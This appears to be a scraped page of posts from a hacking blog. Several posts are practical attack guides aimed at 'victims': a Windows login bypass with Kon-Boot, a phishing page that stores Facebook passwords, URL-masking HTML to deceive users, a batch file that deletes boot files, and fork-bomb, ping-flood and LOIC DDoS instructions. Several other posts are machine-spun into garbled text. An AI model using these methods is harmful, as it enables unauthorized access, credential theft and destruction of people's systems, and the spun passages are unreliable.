Hackbook

How to Bypass Windows 8 Password Login Screen?

2015-01-02T06:13:00.002-08:00

In this tutorial, I will teach you how to bypass the Windows Password Login Screen using KON-Boot.It helps in bypassing the default windows password protection and upon reboot, it leaves no trace. The password isn't changed nor any system settings, it will be just bypass the login screen and deletes all the its temporary files after reboot. At the end of this tutorial, you will be able to log into password protected Windows OS (Tested on: Windows XP, Windows 7, Windows 8, Windows 8.1).

What is KON Boot?

Kon-Boot is an application that modifies the contents of the Windows kernel on the fly / at boot time, bypassing the authorization system and allowing Windows to enter a password-protected user account without a password. Whatever is your favorite password, it is not overwritten when you restart Windows and the original contents of the nucleus and its authorization procedure restored. Kon-Boot boot from floppy / cd / usb, runs in a quiet mode automatically

Requirements

The following will be required to successfully execute this hack.

1. KON-Boot v2.4 - You can download it from here for free and then you will need to install it onto a Bootable USB.

2. USB Pendrive - You need to have a pendrive which is formatted to FAT32. Note: It is important that is formatted to FAT32 for this to work. For formatting, just right click on the USB drive and select "Format" and select "FAT32" from the File System drop down list.

How to Install KON-Boot onto USB

1. First Extract the .zip file. Go to the folder "kon-bootUSB".

2. Now, insert your USB drive into your computer. Make sure, no other USB drive is attached.

3. If you are using Windows 7 or higher,Right click on "usb_install_RUNASADMIN.bat" and click on "Run as Administrator". We need to run this .bat file using administrator rights. Once you open this file, you will get a series of notifications, for which you will have to click on "Okay". If you are using Windows XP or lower.Click on "USB_INSTALL_DIFF.vbs" and follow the instructions.

4. If there has been no problem, you will get the below confirmation dialogue box.

Now that we have successfully installed KON-Boot onto our computer, we can now move into our main step, that is, how to bypass your victim's loging screen.

Bypassing Windows Password Protection

1. You will need to open the BIOS setup. For this, you will need to switch on their computer and as soon as it turns on, you will get a series of options at the lower screen. Click on the appropriate action to "Enter BIOS Setup".It depends entirely on which computer brand your victim uses. My Lenovo computer for instance, opens BIOS when I press "Fn+F10". You can Google for more details.

2. Once you have entered the BIOS setup, you will have to find the "Boot Options". In those options you have to change the order of priority such that the first priority is given to "USB Drive" and then to your Hard Disk. Doing so, will let your computer boot through USB first, instead of the usual Windows through your Hard Disk.

3. Additionally, if your computer has EFI support, please "Disable EFI" in the BIOS settings. It will be near the BIOS settings.

4. After the above changes have been made to the BIOS, you save it and exit. Let the computer restart. You will get 2 options where you click on "KON-Boot (Current Version)" for Windows 7 and higher versions and "KON-Boot (Old Version)" for Windows XP and lower.

5. It might take some time initially to boot the first time, you will also be displayed the KON-Boot logo.That is completely normal. After which the default Windows OS will load.

6. That's it! Now when the Login screen appears, DO NOT type anything for the password, just click the login button and you would have logged on without any problem!

Video

Here is a nice video that I found which helps you understand better.If you are haveing any problem, do check out all the steps below and comment for any other queries!

Additional Information

You can see the konbootWin_guide.pdf which is included in the KON-Boot download for more information and troubleshooting.Below is the list of supported versions of Windows whose Login screen can be bypassed!

Microsoft Windows XP Home Edition (Service Pack 2+) - Yes
Microsoft Windows Vista Home Basic 32Bit/64Bit - Yes (FULL SUPPORT)
Microsoft Windows Vista Home Premium 32Bit/64Bit - Yes (FULL SUPPORT)
Microsoft Windows Vista Business 32Bit/64Bit - Yes (FULL SUPPORT)
Microsoft Windows Vista Enterprise 32Bit/64Bit - Yes (FULL SUPPORT)
Microsoft Windows Server 2003 Standard 32Bit/64Bit - Yes (FULL SUPPORT)
Microsoft Windows Server 2003 Datacenter 32Bit/64Bit - Yes (FULL SUPPORT)
Microsoft Windows Server 2003 Enterprise 32Bit/64Bit - Yes (FULL SUPPORT)
Microsoft Windows Server 2003 Web Edition 32Bit/64Bit - Yes (FULL SUPPORT)
Microsoft Windows Server 2008 Standard 32Bit/64Bit - Yes (FULL SUPPORT)
Microsoft Windows Server 2008 Datacenter 32Bit/64Bit - Yes (FULL SUPPORT)
Microsoft Windows Server 2008 Enterprise 32Bit/64Bit - Yes (FULL SUPPORT)
Microsoft Windows 7 Home Premium 32Bit/64Bit - Yes (FULL SUPPORT)
Microsoft Windows 7 Professional 32Bit/64Bit - Yes (FULL SUPPORT)
Microsoft Windows 7 Ultimate 32Bit/64Bit - Yes (FULL SUPPORT (normal BIOS + EFI BIOS))
Microsoft Windows 8 and 8.1 (32Bit/64Bit) - Yes (FULL SUPPORT (normal BIOS + EFI BIOS)). Local and online authorization.

What and How to Port Scan? - Beginner's verison.

2014-11-09T03:30:00.000-08:00

In this article I hope to impart basic amount of knowledge on port scanning.It is commonly used term while browsing through Hacking related articles. Though, you could always wiki for help. I believe this would be of more use.

Port Scanning

Port scanning is the procedure of hunting for energetic or opened up ports in sufferer system. Similar to a burglar looking for entrance opened up residence. Consider this scanning

A Sample Check ...

Target Host: www.yourcompany.com or IP Address

TCP Port:7 (reflect).
TCP Port:9 (dispose of).
TCP Port:13 (daytime).
TCP Port:19 (chargen).
TCP Port:21 (ftp).
TCP Port:23 (telnet).
TCP Port:25 (smtp).
TCP Port:37 (time).
TCP Port:53 (domain name).
TCP Port:79 (finger).
TCP Port:80 (www).
TCP Port:110 (pop).
TCP Port:111 (sunrpc).

It reveals the energetic ports because domain name or ip address.

Usage of Port Scanning

We could acquire their information without their expertise.(The point is that you could burglary their information).

Checking for open ports is performed in 2 methods.

Check a solitary IP address for open ports:

It much like a burglar that looking for any kind of opened up entrance in solitary property.
In regard to scanning, eviction is port as well as residence is IP address.
We are looking for the energetic port in a solitary IP address.

Example:
hunting for energetic ports just at 123. xx.xx.xx.

Check an array of IP address to discover open ports:

Checking an array of IP address resembles burglar that hunting for any kind of opened up entrance in a road. In connection with scanning, eviction is ports as well as road is array of ip address.

Example:
looking energetic ports just at.
123.20. xx.xx to 123.30. xx.xx.

I hope this article helped you get an idea of the technique of port scanning.

Exploit: SQL Injection Vulnerability in Drupal 7.x

2014-11-08T03:09:00.000-08:00

Safety and security scientists from SektionEins have actually uncovered a vital SQL Shot vulnerability in Drupal CMS that leaves a a great deal of web sites that utilizes Drupal in jeopardy.

Drupal presented a data source abstraction API in variation 7. The objective of this API is to avoid SQL Shot strikes by disinfecting SQL Queries.

This API itself presented a important as well as brand-new SQL Shot vulnerability. The vulnerability makes it possible for assaulters to run harmful SQL questions, PHP code on at risk internet sites. An effective exploitation enables cyberpunks to take total command of the website.

This vulnerability could be made use of by a non-authenticated individual and also has actually been identified as "Extremely Important" one.

You can also directly modify the "includes/database.inc" file to patch this vulnerability; Change the "foreach ($data as $i => $value) {" with "foreach (array_values($data) as $i => $value) {" in 739 line.

A proof of Concept has been released online that allows anyone to change the password of admin account. So, better Hurry UP! Update your Drupal CMS.

One of the reddit user "fyukyuk" posted a HTTP post request that exploits this vulnerability.

The following python Code changes the admin password of vulnerable Drupal to 'admin' (Tested with Drupal versions 7.21,7.31).

PHP fixed Remote Code Execution Vulnerabilities.

2014-11-08T02:41:00.001-08:00

The susceptibility determined as "CVE-2014-3669" could induce an integer overflow when analyzing specifically crafted serialized information with the unserialize (). The susceptibility is simply a 32-bit system, however the risk is induced by the violation which the serialized information usually originate from user-controlled stations.

On top of that, the updates have actually been dealt with mistakes connected with the intro of a void byte in the collection cURL, calling the harm vibrant memory throughout handling of the changed information as a feature of exif_thumbnail () in photo handling (CVE-2014-3670), along with buffer overflow in the feature mkgmtime () from the component XMLRPC (CVE-2014-3668).

These susceptibilities were uncovered by the Study laboratory of IT protection business High-Tech Bridge.

The brand-new models 5.6.2,5.5.18 and also 5.4.34 address these 3 susceptibilities.

The PHP advancement group has actually launched brand-new models in order to repair 3 protection susceptibilities -among them is stated to be a crucial one as well as brings about remote code implementation.

How to Stop and Prevent a DDoS Attack.

2014-11-01T07:10:00.002-07:00

Distributed denial-of-service (DDoS) assaults are all the time in high headlines worldwide, as they're plaguing web sites in banks, and nearly of virtually each group having a distinguished on-line presence. The primary trigger behind the proliferation of DDoS assaults is that there's a very low-price that the attacker has to incur to place such assault in movement. Thankfully, at present numerous prevention strategies have been developed to sort out such assaults. Earlier than delving additional into understanding concerning the methods to stop DDoS assault, let’s first perceive what precisely a DDoS assault is and eventually you will be able to perfom such an attack too through this article : How to DDoS Attack

What is a DDoS attack?

Coutrsey - Cisco.com

DDoS Attack Bots

A DDoS (distributed denial-of-service) assault is an try made by attackers to make computer systems’ assets inaccessible to its anticipated person. As a way to perform a DDOS assault the attackers by no means makes use of their very own system; slightly they create a community of zombie computer systems usually known as as a “Botnet” – that could be a hive of computer systems, to incapacitate an internet site or an internet server.

Let’s perceive the fundamental concept! Now, the attacker notifies all of the computer systems current on the botnet to communicate with a specific web site or an internet server, repeatedly. This will increase site visitors on the community that causes in slowing down the pace of a website for the supposed customers. Sadly, at occasions the visitors could be actually excessive that would even result in shutting a web site utterly.

3 Fundamental Tricks to Stop a DDoS Assault

There are a number of methods to forestall the DDOS assault; nonetheless, right here on this visitor publish I’ll be protecting three primary ideas that may aid you to guard your web site from the DDoS assault.

1.Purchase Extra Bandwidth.

One of many best strategies is to make sure that you will have ample bandwidth in your internet. You’ll have the ability to sort out a lot of low-scale DDOS assaults just by shopping for extra bandwidth in order to service the requests. How does it assist? Properly, distributed denial of service is a nothing greater than a recreation of capability. Let’s suppose you might have 10,000 laptop techniques every distributing 1 Mbps directed in the direction of your approach. This implies you’re getting 10 GB of knowledge that's hitting your internet server each second. Now, that’s causes quite a lot of visitors!

So to keep away from such challenge, it's essential apply the identical rule meant for regular redundancy. In line with this method, if you want extra net servers simply multiply round numerous datacenters and subsequent make use of load balancing. By spreading your visitors to varied servers will provide help to steadiness the load and can almost definitely create giant area enough to deal with the incessant improve in visitors.
Nonetheless, there’s an issue with this methodology that's shopping for extra bandwidth is usually a pricey affair. And as you’ll know that the present DDoS assaults are getting massive, and could be a lot larger exceeding your price range restrict.

2. Go for DDoS Mitigation Providers.

Loads of community or Web-service suppliers render DDoS mitigation capabilities. Search for an web service supplier having the most important DDoS safety and mitigation community, automated instruments, and a pool of gifted anti-DDoS technicians with the wherewithal to take motion in actual-time as per the various DDoS assault traits. A viable different is to make the most of a DDoS prevention equipment, which is particularly meant to find and stop distributed denial-of-service assaults.

3.Restricted Connectivity.

In case you might have pc techniques which are related to the online straight, a greater concept is to correctly set up/configure your routers and firewall in order to restrict the connectivity. For an occasion, whereas receiving some knowledge from a shopper machine you may solely permit visitors to move from the machine solely on a number of chosen ports (like HTTP, POP, SMTP and many others.) through the firewall. Cloudflare.com is a good website to consider for free DDoS attack prevention for people with no technical background.

Conclusion

Web sites are largely getting attacked by hackers each second. Denial-of-service assault is insanely getting enormous and is creating a whole lot of issues for enterprise organizations having robust on-line neighborhood. On this visitor put up you’ll not solely perceive what a DDoS assault really means, however will even come to learn about a number of sort of strategies to forestall DDoS assaults. Aforementioned are three suggestions that I’ll advocate you to run via to at the very least perceive the place to get began in the direction of constructing a resilient net community with possibilities of surviving a DDoS attacks

How to Trace Back a Hacker's Malware?

2014-10-23T03:50:00.002-07:00

In this tutorial I'll be showing you ways to obtain a hacker's information, particularly his IP address.Once you have his IP address, you can trace it to the exact location through a number of IP Lookup tools such as this free one : http://whatismyipaddress.com/ip-lookup.If you have been successful in identifying the malware file that a Hacker infected you with, then it saves most of the trouble and we can simply work on this file. I will be showing you have an unprotected hacker can give himself up to the feds by doing something stupid like this. I believe, this tutorial is a must for every hacker who does not maintain is anonymity.

Instructions

First off, you will be needing these two softwares, Wireshark - Packet Analyzer and Sandboxie - Program isolation Software

1. Open Wireshark.
2. Click on Wireless Network Connection or Local Area Connection depending on whichever kind of network you are currently on. Then click Start.

3. For RATs usually the type of connection made is through DNS. For keyloggers , the connection is usually made through FTP or SMTP. Let us use a DNS connection for detecting a RAT in this example.By doing this, you will able to see all the DNS connections that are being made from your computer.

4. Now open Sandboxie. Any program that is opened via this tool, completely isolates the program from the rest of the computer, therefore, once you close sandboxie, then all the programs running through it will be terminated and your computer would not be affected in anyway.

5. Now we need the file that you suspect is the virus.Let us assume that you have a file named as notantivirus.jpg.png.exe as shown below. When you open through Sandboxie, the virus is trapped in it, but it can access all your saved data such as Saved Passwords on your browsers.Make sure you clear them.

6. Go back to wireshark, you will see a connection that is of the form

somethingsomething.no-ip.biz

It can be of something else, where no-ip.biz is replaced by some other Dynamic DNS service.

7. Once you get that address.Then you can simply ping that address via Command Prompt and get the IP address to which it is connected to!

Conclusion

Hackers often overlook the anonymity and get caught by the feds through very silly ways. There have been several such examples in the hacking world where top notch hackers were caught while trying to hack the best servers such as League of Legends in this case : http://www.dailydot.com/esports/jason-shane-duffy-league-of-legends-hacks/. It is therefore important to know this method to pin down such hackers and if you happen to be one, then it is a must to get anonymous through proxy servers or through other means.

How to Crack MD5, SHA-1, SHA-2 Hashes.

2014-10-23T02:40:00.001-07:00

I've seen some requests for individuals to crack hashes, and a few individuals are not doing it right, simply giving a hash isn't enough to assist anyone in this matter,This tutorial will walk through the fundamentals and take a look at and assist you move into your way forward in hashing.

Introduction to Hashes

It is common to observe for many Internet programmers to secure words by storing the encrypted word of the password as a information, which is how they do not they risk a serious security flaw which might hurt their customers and themselves.Hashes also are called Cryptography, in a way.Some hashes will decrypt designedly, where as for others the only alternative is to brute force.An example of encoding that enables decryption is Base64.

Need-To-Know's concerning Hashes

Widely used Hash varieties include:

MD5
SHA-1
SHA-2

This means these three are those you wish to be wanting into once you grab a hash.

MD5: 32 words - Collision (Yes).
SHA-1: 32 words - Collision (Yes).
SHA-2: 64 words - Collision (No).

Hash Collisions

From the table that I created above, you'll be able to see MD5 and SHA-1 have Hash Collisions.This implies that more than one hash have have the same value.This is good judgment seeing as MD5 and SHA-1 ar each thirty two Characters long, and there's a limit of what number thirty two random characters you'll be able to build, I mean it isnt infinite. Therefore their cipher to be a Collision at some purpose.

H(a) = H(b)

H representing the hash perform.

Online Hash Decryption Sites

Many sites host services wherever you'll be able to md5 cypher no matter what you wish for. However at a similar time this service saves each values for later.
So remember once you use these services your md5 input and output are saved in their information as an "md5 decode" service.

A list of Hash rewrite Sites you'll be able to use. You can also look at these on line tools that I've collected for Free Online MD5 Decryption

http://www.cmd5.com/english.aspx (457,354,352,282)
http://www.md5crack.com
http://www.hashchecker.com
http://md5cracker.tk/ (MD5 programme by searching a complete of fourteen on-line balmy.)
http://www.md5decrypter.com (5,889,729)
http://www.md5oogle.com
http://md5-db.com (The information is roughly 70gb)
http://md5.rednoize.com (56,502,235)

http://www.tmto.org/?category=main&page=search_md5 (306.000.000.000)

http://passcracking.com/ (Register to extend your priority)
http://www.xmd5.org

Brute Forcing

Most secure CMS's (Content Management Systems) use Salts and totally different algorithms.An example is

Common: md5($password);
PHP-Fusion: md5(md5($password));
VBulliten: md5(md5($password).$salt);
MyBB: md5(md5($salt).$password);

Knowing the Hash + Hash rule is required once requesting assistance on cracking a hash.

Recommended Brute Forcing Programs

HashCat - Worlds fastest WPA cracker with dictionary mutation engine. The below are the algorithms that it can crack. Which is by far the most offered by any program!

HashCat = UNIX
HashCat interface = Windows.

MD5
md5($pass.$salt)
md5($salt.$pass)
md5(unicode($pass).$salt)
md5($salt.unicode($pass))
HMAC-MD5 (key = $pass)
HMAC-MD5 (key = $salt)
SHA1
sha1($pass.$salt)
sha1($salt.$pass)
sha1(unicode($pass).$salt)
sha1($salt.unicode($pass))
HMAC-SHA1 (key = $pass)
HMAC-SHA1 (key = $salt)
MySQL
MySQL4.1/MySQL5
phpass, MD5(Wordpress), MD5(phpBB3)
md5crypt, MD5(Unix), FreeBSD MD5, Cisco-IOS MD5
SHA-1(Django)
MD4
NTLM
Domain Cached Credentials, mscash
SHA256
sha256($pass.$salt)
sha256($salt.$pass)
sha256(unicode($pass).$salt)
sha256($salt.unicode($pass))
HMAC-SHA256 (key = $pass)
HMAC-SHA256 (key = $salt)
md5apr1, MD5(APR), Apache MD5
SHA512
sha512($pass.$salt)
sha512($salt.$pass)
sha512(unicode($pass).$salt)
sha512($salt.unicode($pass))
HMAC-SHA512 (key = $pass)
HMAC-SHA512 (key = $salt)
SHA-512(Unix)
Cisco-PIX MD5
WPA/WPA2
Double MD5
bcrypt, Blowfish(OpenBSD)
MD5(Sun)
md5(md5(md5($pass)))
md5(md5($salt).$pass)
md5($salt.md5($pass))
md5($pass.md5($salt))
md5($salt.$pass.$salt)
md5(md5($pass).md5($salt))
md5($salt.md5($salt.$pass))
md5($salt.md5($pass.$salt))
md5($username.0.$pass)
md5(strtoupper(md5($pass)))
md5(sha1($pass))
sha1(sha1($pass))
sha1(sha1(sha1($pass)))
sha1(md5($pass))
MD5(Chap)
SHA-3(Keccak)
Half MD5
Password Safe SHA-256
IKE-PSK MD5
IKE-PSK SHA1
NetNTLMv1-VANILLA / NetNTLMv1-ESS
NetNTLMv2
Cisco-IOS SHA256
Samsung Android Password/PIN
AIX {smd5}
AIX {ssha256}
AIX {ssha512}
AIX {ssha1}
GOST, GOST R 34.11-94
Fortigate (FortiOS)
OS X v10.8
GRUB 2
IPMI2 RAKP HMAC-SHA1
sha256crypt, SHA256(Unix)
Plaintext
Joomla
osCommerce, xt:Commerce
nsldap, SHA-1(Base64), Netscape LDAP SHA
nsldaps, SSHA-1(Base64), Netscape LDAP SSHA
Oracle 11g
SMF > v1.1
OS X v10.4, v10.5, v10.6
EPi
MSSQL(2000)
MSSQL(2005)
EPiServer 6.x < v4 EPiServer 6.x > v4
SSHA-512(Base64), LDAP {SSHA512}
OS X v10.7
MSSQL(2012)
vBulletin < v3.8.5 vBulletin > v3.8.5
IPB2+, MyBB1.2+
WebEdition CMS
Redmine Project Management Web App

PasswordsPro - Is a professional password recovery quite. They also claim to be the world's strongest in recovering hashes.

Word lists for Brute-forcing

To brute force passwords,it would obviously be a good judgment you wish an inventory of words.Depending on the size of your CPU and your processor.You can scrutinize all the various word lists from word lists available on line or by using a word list generating software.

You can always get it from various sources, like forums, blogs etc. But my favourite is this list : http://www.infosecisland.com/blogview/11968-Brute-Forcing-Passwords-and-Word-List-Resources.html.It contains by far, the most compact but at the same time a vast list of combinations. Head over to that website and download any list of your choice.

Conclusion

With this tutorial, I hope to show you a few ways in which you can approach towards the problem of cracking MD5. This isn't a fail proof method but it will definitely enlighten you in the topic and lets you crack majority of hashes.

How to Hide or Conceal URL?

2014-10-12T02:53:00.002-07:00

As a continuation of tutorials on Phishing, we show you in this tutorial how to conceal a URL.That is, with the following techniques you can make a suspicious URL look much more trust able. For example, a URL like http://username353.000webhost.com/index.php can be made into a much cleaner and click able link as http://facebo0k.tk/. In this post, we shall explore all such possibilities with which you can deceive a user to click on a link of your choice.Though this technique can always be detected by a smart user, it is possible to get creative with these options by social engineering your victim.

URL Shortening

This method is probably the easiest. Let us assume you have a link like http://username353.000webhost.com/index.php which you wish to hide. The easiest way is to convert into a URL like this http://is.gd/facebook_offers, if you click on that link, it will automatically redirect you to http://username353.000webhost.com/index.php and an attentive user will not notice the URL change!

So, here are a few good URL shortening services.

is.gd - customizable URL link
goo.gl - google's official URL shortener, but not link customization
bit.ly - customizable URL link but a very famous website, less likely to deceive a user.

For more services, visit : http://www.hongkiat.com/blog/url-shortening-services-the-ultimate-list/

Custom Domain

Often, when big phishing scandals are going on worldwide where hackers acquire hundreds of thousands of login infos with the help of Phishing, it involves the use of an even more convincing link which can easily deceive, the users.

Paid Custom Domain - usually require you to pay for something like www.mywebsite.com along with that, you need a hosting. If you're familiar with usage of custom domains, then is not a problem.

Free Custom Domain - you can also free custom domain using a website called dot.tk . Therefore a URL like http://username353.000webhost.com/index.php will be converted to www.facebo0k.tk.

Hyperlink Masking

Many a times, you might want to include a link into an email or an webpage. In which case, you can simply use HTML tags in a smart way to misuguide the usre into what he is clicking.

For example, click on www.facebook.com. It goes to http://username353.000webhost.com/index.php.Here we made use of how a link is embedded in webpage.The code for such a link would be.

<a href="http://username353.000webhost.com/index.php">www.facebook.com</a>

iFrame Inclusion

In this technique we yet again use the help of HTML and include an iframe into a web page. For instance, go to this webpage that I created http://bragtools.com/iframe-demo/index.html. As you can see in that website, the URL of the website itself is different from the original domain www.hackbook.net. Using this technique, you can include an iframe in any web page.

The code you need to use in the webpage is.

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
    <head>
        <title>iFrame Inclusion Demo</title>
        <style type="text/css">
            body, html
            {
                margin: 0; padding: 0; height: 100%; overflow: hidden;
            }

            #content
            {
                position:absolute; left: 0; right: 0; bottom: 0; top: 0px;
            }
        </style>
    </head>
    <body>
        <div id="content">
            <iframe width="100%" height="100%" frameborder="0" src="http://hackbook.net" />
        </div>
    </body>
</html>

NOTE: The problem with iframe is that, you CANNOT redirect this URL to another, in this case, redirecting http://bragtools.com/iframe-demo/index.html to anything else is not possible, so If the user does realizes this at some of of time, he will become suspicious.

Conclusion

It is all up to your creativity and social engineering with which you can come up with more techniques. In our Hacking eBook we show several other methods which cannot be easily detected! Please so leave any suggestions, comments or ideas.

How to Hack by Phishing Page?

2014-10-07T06:28:00.000-07:00

As a continuation of this week's Phishing Special! we show how to set up and tap User and Password details of a particular website. Assuming, you have read the previous tutorial on 'What is Phishing?' we will move on to how to set up such a page that is accessible by everyone by hosting it on a web server.

Demo

Go to : http://bragtools.com/phishing-demo/

Here is a phishing page that was set up for demonstration purposes that is a typical login form without the website design but when you enter your credentials and click on 'Submit' , it will inconspicuously redirect you to /login.php and then www.facebook.com/login. And the passwords are automatically stored as a text file at: http://bragtools.com/phishing-demo/passwords.txt

In the following post, we will use this same technique just that, our website would look exactly like the original Facebook webpage but on a different URL as shown below.

Instructions:

In order to set up your own page and host it on a website, first off you will need to download the phishing page script below.

File Details:

File URL: http://www.mediafire.com/download/vs1j15755s7lcbb/facebook-hackbook.rar
File Name: Facebook-Hackbook.rar
Size: 14KB
Type: .rar (compressed archive)

1.Register an account at a website that gives free webhosting such as 000webhost.com
2. Go to the File Manager > Upload Files .Select all the files and upload.
3. Now go to your website that is of the form

www.your-username.000webhost.com/index.php

4. This is the website that you have to send to your friends. This where the phishing page has been hosted. Any details entered here are stored at :

www.your-username.000webhost.com/passwords.txt

5. That's it folks! All you have to do now is improvise on this and conceal this URL using different techniques (the next article of this series!), you could use a bit of social engineering. It's all up to your creativity now!

Premium Version:

Since this was a promotional guide for our eBook, we showed you how to set up a demo phishing page.The above script has limited features and cannot be modified as per your requirement. In order to customize the script, so as to send the hacked email ids and passwords directly to your email account and with custom URL redirection, please buy the customized phishing pages that come along with our Ethical Hacking eBook at : Hackbook.net

What is a Phishing Page?

2014-10-06T04:42:00.003-07:00

Hello everyone! As a campaign for our new eBook "HackBook", we have decided to launch a series of new guides that will be posted everyday as a sequence to this post. In this article, we shall highlight the treats you might face due to this technique and also, we will dive into its depths in the coming articles in the future.

What is Phishing?

Phishing in its simple sense is a way of 'fishing' out a user's login details of a website. A phishing webpage looks very similar to a website but has other motives behind it. For example, this is a webpage that looks exactly like facebook, when you click on Sign In, it will redirect you to another webpage /login.php where it will quickly collect the Username and Password that you wrote and redirect you to the original Facebook website.

Most of the users wouldn't notice this in the URL, they would overlook it and mistake it for having entered the wrong credentials.When they enter it the next time, they would simply login without any hassle as they are now on the original website, without even realizing that the Password has been hacked!

Demo: http://bragtools.com/phishing-demo/
Stored Data: http://bragtools.com/phishing-demo/passwords.txt

How can I protect myself?

Usually phishing involves stealing personal data such as the ones below.

Usernames and passwords
Social Security numbers
Bank account numbers
PINs (Personal Identification Numbers)
Full credit card numbers
Your mother’s maiden name
Your birthday

There are several ways through which this attack is launched.

Emails - Mostly through emails with fake sender's info using the technique called Anonymous Mailing.For instance, with anonymous mailing, I could send a mail from billgates@microsoft.com right into your inbox and you would actually believe it to be true. It would look very legitimate and say something like this:

"Your Password has to be reset, please follow the link ("Phishing Page") to confirm you're username and password."

Though such mails look very convincing, it is important to cross check the Sender's Mail, and report such a phishing immediately.

Courtsey : Wikipedia.com

Chats - Chatting online in chat rooms or on Facebook with strangers can potentially compromise your computer in a number of ways. Clicking on unsafe links such as 'check out my xxx pics' has been shown statistically to be used often against teenagers. Therefore, not opening links randomly without any proper understanding of the website can help you protect your account.

HTTPS - Always look for an HTTPS on the website, it ensure safe passage of information from your computer to the website. Especially with websites that involve credit card and bank information details.

Falsifying Details - You can always be extra sure by giving in fake login details and see how the webpage responds to it, if it quickly redirects you to another website then you could be sure that you dodged a phishing attack.

How to Create a Phishing Website?

We have written around 13 phishing pages along with detailed instructions in our Hackbook, please do check it out! In the next guide (tomorrow!) of this series on Phishing pages, we will demonstrate and show you how a simple phishing page can be set up to trick your friends!

Command Prompt Tricks: How to Kill a Computer?

2014-09-05T03:09:00.000-07:00

In this article, I will outline a few ways simple ways of removing important system files that will halt the functionality of a computer, using cmd. Though these commands may not always work if it has a file access restrictions on users.

Instructions

Note: DO NOT run this script on your computer, it might potentially harm your computer.To safely test such viruses, you can try running it though sandboxie or any other Sandbox emulation software.

Open notepad or any text editor of your choice.
Paste the below code in a new file.
@echo off attrib -r -s -h c:\autoexec.bat del c:\autoexec.bat attrib -r -s -h c:\boot.ini del c:\boot.ini attrib -r -s -h c:\ntldr del c:\ntldr attrib -r -s -h c:\windows\win.ini del c:\windows\win.ini
Click on "Save As" select File Type as "All files" and save it as 'something.bat'.
Basically, we are creating a batch file that will run system commands.

What does this do?

@echo off - Prevent the line from being shown on the screen.
attrib -r -s -h - Configures file attributes read only,system, hidden.
del - Deletes a file from a location.
boot.ini - Contains boot configuration.
autoexec.bat - Loads programs and drivers on boot.

How to do a DDoS Attack?

2014-08-26T09:53:00.002-07:00

In this post I will try and address all the basics of a DDoS attack and how to launch your very own small attack. After a series of targeted attacks performed by the infamous Anonymous group, this word has been on the news for quite a while now.

What is DDoS Attack?

DDoS is a form of organized attacks from various computers targeting a server by overloading it.This is usually done by sending huge number of useless packets packets to the remote website.

A representation of DDoS Attack - Courtsey: Cisco

For instance, I had written some PHP code that sends the same information onto my SQL server over and over again.As a result, my webhost was taken down (accidentally) in a few minutes by a mere bug in my code. As an experience, I've made sure, I always use a good hosting provider with a good firewall for this very reason.

Sample Attack

Below is a simple command to understand how DDoS attacks work.

This is a batch file. Save it as .bat
:a
start
goto a
Now, before you run this, its better you save your files because this is mostly likely going to crash your computer.
This happens because this little sucker is going to continuously create copies of this file.
By this, you actually create useless tasks in your computer's RAM hence hogging up your resources.

A DDoS attack works pretty much the same way.Instead of sending CMD commands, they instead send 'packets' in an infinite loop till it crashes.

Why doesn't my DDoS attack crash a Server?

To put it in simple words, the geeks sitting behind those server are just smarter than you. :) If I were to launch an attack from my computer, they would immediately be warned by a few small checks done by their firewall.As a result, any pings made from my computer will be identified as a potential treat and hence,blocked.

Usually, the best DDoS attacks are performed by millions of computers (usually, which have been hacked by a hacker by RATs or Worms) simultaneously to take down the best of the government websites.Such organized attacks have been performed successfully in the past by 'Anonymous'.

Types of DDoS Attacks.

DDoS by Ping Flood - Start up your server. And type in the ping command
ping -t -a -l 65500 localhost
This will repeatedly ping a server till your server crashes or this gets tired.In this case, I've used localhost.You could also ping a remote address provided an IP address.By default the ping will send 32bytes of data to the server, so you must change this to a bigger number. The maximum is 65,500bytes, so that is what we used.If you send a server any number higher than 65,500bytes it will instantly crash. This is called "Ping of Death".
DDoS by Reloading - This requires a bit of knowledge of PHP and HTML forms. Basically, you create a GET/POST method to remote webpage of the server. Then, when you run the .php page, the browser will ask you to re-load the page.Reload it and continue till its down. There are severals methods to automate this task, google will be your friend here.
+ other gazillion methods!

Low-Orbit Ion Cannon

This open source tool coded in C# was used by Anonymous during the attacks of Project Chanology.This tool attempts to DDoS the target site by using all its bandwidth, sending TCP, UDP, or HTTP requests to the server until it crashes.

Download: http://sourceforge.net/projects/loic/

Usage Instructions:

Open LOIC.exe and fill out the below information.
IP or URL = IP or URL that you wish to DDoS.
TCP / UDP message = information being sent, just write something random. Or leave it as default.
Port = Server's port.
Method = Server's Method, leave as TCP if unknown.If you are gonna try to take down a website then use HTTP.
Speed = set to "<= faster".
Threads = How many users it should simulate, the higher the number the faster it will crash. Set to 10,000. Note that this might make your computer lag, if so, set to a lower amount.
Click on "IMMA CHARGIN MAH LAZER".This starts your the program.

Warning: Remember DDoS is a federal crime.People of all ages have been arrested by using this tool.

Conclusion

The above methods are just the basics and give the whole ideas of what these attacks are about.Do not expect to take down government websites by doing the above kiddish methods.You will need to acquire slaves (hacked computers) usually by RATs or Worms,that will exponentially improve your ability to take down website. I've written an ebook specially for beginners to teach the how to hack by RAT and worm. It will help you by a huge margin.

Online Torrent to Direct Link Converter

2014-04-23T05:24:00.000-07:00

Many a times, the ports required by the torrent clients are blocked.Which is why, converting a torrent file and downloading it through a direct link can always be a handy tool. Moreover, you could always use these services to speed up the processing of downloading the file due to the lack of seeders.I hope this article is of certain help to users who have either slow torrent speeds or if torrent connections are blocked (you can gladly well use this to bypass the problem). In this post, I'll give you a list of good Online FREE services that help you do the same.

Websites

zBigz.com - This is probably the best free service out there.The caching is very fast.Goes upto 1 MB/s for free users. And also, you can download any torrent that is below 1GB.

Direct-Torrents.com - Lets you download the torrents faster and safer keeping your identity anonymous. Though their caching is a bit slow, it is work a shot.

Furk.net - This service does provide same features and more. Infact, it provides users with the ability to download files from different servers onto their serves.

.Filestream.me - Yet another good service.In terms of support.This seems to do better than the rest.Also they let you download anything that is below 2GB. Highest in terms of file size.

Other services:

http://www.boxopus.com/
http://bytebx.com/
http://justseed.it/
https://put.io/

How to use?

1. First of all, you go to ne of the above websites. You input the .torrent file using remote URL, magnet URL or even .torrent file upload.

2.Next, you press the "Go" button and wait for the direct link for the torrent to be generated. The caching speed is pretty impressive, so if you live in a country with low internet speed, this will be useful.

3.Now, once your direct download link has been generated, you can download it using IDM or any other download accelerator to save the hassle of waiting for the torrent download.

Get IMDB Ratings for Huge Movie Lists

2014-04-13T04:59:00.000-07:00

